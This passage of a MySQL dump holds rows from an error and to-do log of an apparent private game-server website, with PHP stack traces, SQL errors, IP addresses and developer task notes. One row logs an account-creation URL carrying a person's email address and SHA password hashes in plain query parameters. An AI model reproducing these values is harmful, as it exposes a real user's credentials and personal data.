\'mangos_zero_realm.accountRIGHT\' doesn\'t exist', 'f72f696f61293a9a64e9377c1e992950faed80b6', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT COUNT(*)...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT COUNT(*)...\')\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(26): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_account/saimod_mojotrollz_db_account.php(6): SYSTEM\\DB\\QQ::Q1()\n#4 [internal function]: saimod_mojotrollz_db_account::sai_mod_saimod_mojotrollz_db_account()\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.02, '2014-12-24 20:32:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_account', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (880, 'Exception', 'Spawnpoints', '8aed05e1cd6ad54438fcb11ec7c69abc15e68cdb', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Spawnpoints\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-24 20:36:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Spawnpoints', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (881, 'Exception', 'Create Account', 'eff4fd865f1aa1363be44efcc15ae025e604eb30', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Create Account\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-24 21:07:11', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Create%20Account', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (882, 'Exception', 'Delete old accounts', '0fe1bfbca2e07157d33dba7bce42166f7564fe54', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Delete old acco...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-24 21:07:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Delete%20old%20accounts', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (883, 'Exception', 'saimod db accounts search interface, char count', '42ec4a6985f429d9037e0d47c14216a19dc01d61', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'saimod db accou...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-24 21:08:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=saimod%20db%20accounts%20search%20interface,%20char%20count', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (884, 'SYSTEM\\LOG\\ERROR', 'Could not execute prepare statement: Duplicate entry \'0\' for key \'PRIMARY\'', 'a858dddb04867a1c3d4fb147d6e52db0d34526be', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 38, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\CHAR_CREATE\', \'INSERT INTO `ch...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\CHAR_CREATE\', \'INSERT INTO `ch...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(29): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/char/charcreation.php(53): SYSTEM\\DB\\QP::QI(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/beta/Security.php(40): charcreation::save(9)\n#5 /home/web/webdir/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'Nael\', \'fdf398827e3f993...\', \'t.rechel@gmx.de\', \'enUS\', false, true, \'3f16fcd9a194\', \'aa23e715012f528...\')\n#6 [internal function]: api_mojotrollz_beta::call_account_action_create(\'Nael\', \'fdf398827e3f993...\', \'t.rechel@gmx.de\', \'enUS\', \'3f16fcd9a194\', \'aa23e715012f528...\')\n#7 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#8 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#9 {main}', '37.24.148.242', 0.23601, '2014-12-30 05:52:12', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=Nael&password_sha=fdf398827e3f99363587eac6d24e0f9d52fa916e&email=t.rechel@gmx.de&locale=enUS&betacode=3f16fcd9a194&wow_password=aa23e715012f528ab50353441194b525f43e109b', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 22, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (887, 'Exception', 'Scholo viewing room problem', 'f3afe61ea96ef8b01c1d9763c40a82e4594ebcd4', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Scholo viewing ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-30 05:50:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Scholo%20viewing%20room%20problem', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (888, 'Exception', 'todo project percentage message for timeline', 'c80a9fa6e90fc77d08ea617d0bfeac27e37493e5', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'todo project pe...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-30 12:21:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=todo%20project%20percentage%20message%20for%20timeline', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (891, 'Exception', 'zg raptor respawn', 'f26becf0a1d0a09af73aca3ddad5885ca3ad477a', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'zg raptor respa...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-31 01:53:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=zg%20raptor%20respawn', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (889, 'Exception', 'warrior sunder armor stack', 'ee97219e7d54a609266d6aed399a301a4321a591', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'warrior sunder ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.064, '2014-12-31 00:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=warrior%20sunder%20armor%20stack', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (890, 'Exception', 'rogue sprint improve, vanish?', 'fa844b2d976cfe675ca5bfbfd6002ce3c8b4ee1b', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'rogue sprint im...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-31 00:01:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=rogue%20sprint%20improve,%20vanish?', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (895, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\SAI\\todo_stats_mojo', '869b0fd1110fbb6da1d8d6daad84d6600ff97aeb', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\SAI\\\\todo...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/stats/todo_stats_quest_mojo.php(4): spl_autoload_call(\'SYSTEM\\\\SAI\\\\todo...\')\n#2 [internal function]: todo_stats_quest_mojo::stats()\n#3 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php(83): call_user_func(Array)\n#4 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php(92): SYSTEM\\SAI\\saimod_sys_todo::statistics()\n#5 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_stats()\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#8 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#9 {main}', '37.24.148.242', 0.06, '2015-01-03 23:01:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=stats', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (892, 'Exception', 'caster move in line of sight', '03645569ae68cbd77c025be2a3402da48df3057a', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'caster move in ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.012, '2014-12-31 08:45:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=caster%20move%20in%20line%20of%20sight', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (893, 'Exception', 'strat rat trap', '79b80277ed45111daa65dd8770c8ca7d0ed30bb5', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'strat rat trap\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-31 08:46:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=strat%20rat%20trap', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (894, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'character ON (character_social.id = character.id) WHERE guid = ?\' at line 1', '2430f4383051ec45f41c28b82ad4377e3b5fa99c', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM c...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM c...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_menu_sub/user_nexus_menu_sub.php(33): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/index.php(12): user_nexus_menu_sub->html()\n#4 {main}', '37.24.148.242', 0.072, '2014-12-31 22:43:53', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu_sub&menu=3&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (903, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1423008000000', '6f86d0828b205e0490693ee8aa94b95544a86a3d', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.78.252', 0.048, '2015-02-21 08:16:33', '85.10.198.18', 80, '/api.php?call=files&cat=sys&id=system.js&_=1423008000000', 'a:0:{}', 'http://85.10.198.18/index.php?p=server&sub=chars&page=10', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 2, 1, 0, '2015-09-09 07:49:08'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (896, 'Exception', 'tag search', 'b0e38eefba537409d6fbe0ed7df622686b657048', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'tag search\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.024, '2015-01-04 21:32:21', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=tag%20search', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (897, 'Exception', 'All Rare Mobs are Elite', '0b6fb781d72155ece177e44af614e2cd48bda57b', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'All Rare Mobs a...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2015-01-05 20:13:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=All%20Rare%20Mobs%20are%20Elite', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 13, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, 